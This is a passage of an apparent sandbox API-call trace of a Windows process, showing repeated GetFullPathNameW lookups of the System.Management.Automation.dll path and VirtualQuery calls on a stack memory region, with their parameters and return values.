lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.642] VirtualQuery (in: lpAddress=0x24b370, lpBuffer=0x24c230, dwLength=0x30 | out: lpBuffer=0x24c230*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.642] VirtualQuery (in: lpAddress=0x24b400, lpBuffer=0x24c2c0, dwLength=0x30 | out: lpBuffer=0x24c2c0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ba80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ba80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.642] VirtualQuery (in: lpAddress=0x24b370, lpBuffer=0x24c230, dwLength=0x30 | out: lpBuffer=0x24c230*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.643] VirtualQuery (in: lpAddress=0x24b400, lpBuffer=0x24c2c0, dwLength=0x30 | out: lpBuffer=0x24c2c0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ba80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ba80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.644] VirtualQuery (in: lpAddress=0x24be10, lpBuffer=0x24ccd0, dwLength=0x30 | out: lpBuffer=0x24ccd0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.646] VirtualQuery (in: lpAddress=0x24be10, lpBuffer=0x24ccd0, dwLength=0x30 | out: lpBuffer=0x24ccd0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.648] VirtualQuery (in: lpAddress=0x24be10, lpBuffer=0x24ccd0, dwLength=0x30 | out: lpBuffer=0x24ccd0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.649] VirtualQuery (in: lpAddress=0x24be10, lpBuffer=0x24ccd0, dwLength=0x30 | out: lpBuffer=0x24ccd0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.649] VirtualQuery (in: lpAddress=0x24b500, lpBuffer=0x24c3c0, dwLength=0x30 | out: lpBuffer=0x24c3c0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.650] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.650] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.650] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.651] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.651] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.651] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 